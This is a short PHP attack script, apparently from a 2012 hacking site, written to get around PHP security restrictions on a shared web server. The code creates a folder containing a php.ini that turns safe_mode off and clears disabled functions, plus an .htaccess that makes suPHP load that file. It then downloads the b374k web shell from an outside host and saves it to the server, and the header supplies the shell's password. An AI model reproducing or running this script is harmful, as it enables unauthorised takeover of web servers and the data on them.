<?
/*
* Title : Bypass Server [ Sfa7 Trick ]
* Coder : Dr.KroOoZ
* Home : sec-art.com
* Greets To : b0x - injection !
* Must Upload Like Here : /home/user/www/ | http://localhost.com/bypass.php
* Password Shell is : b374k
*/
# Mkdir
$dir = "mkdir";
$bb = $dir('krz');
if($bb){
echo "[krz] => Folder Create Complate !";
} else {
echo "[krz] Error !";
}
# php.ini
$krz = fopen('krz/php.ini', 'w');
$sec = "safe_mode = OFF
disable_funtions = NONE";
fwrite($krz ,$sec);
fclose($krz);
if($krz){
echo "<br>[php.ini] => Create Complate !";
} else {
echo "<br>[php.ini] Error !";
}
# .htaccess
$create = fopen("krz/.htaccess", 'w');
$s3c = "suPHP_ConfigPath /home/".get_current_user()."/public_html/krz/php.ini";
fwrite($create ,$s3c);
fclose($create);
if($create) {
echo "<br>[.htaccess] => Create Complate !";
} else {
echo "<br>[.htaccess] Error !";
}
# Shell
$b37 = 'http://piratlar.com/shellz/b374k-2.txt';
$sh = file_get_contents($b37);
$open = fopen('krz/krz.php', 'w');
fwrite($open,$sh);
fclose($open);
if($open) { echo "<br>[krz.php] => Shell Upload Complate !";
} else {
echo "<br>[krz.php] => Error !";
}
?>
diciembre 02, 2012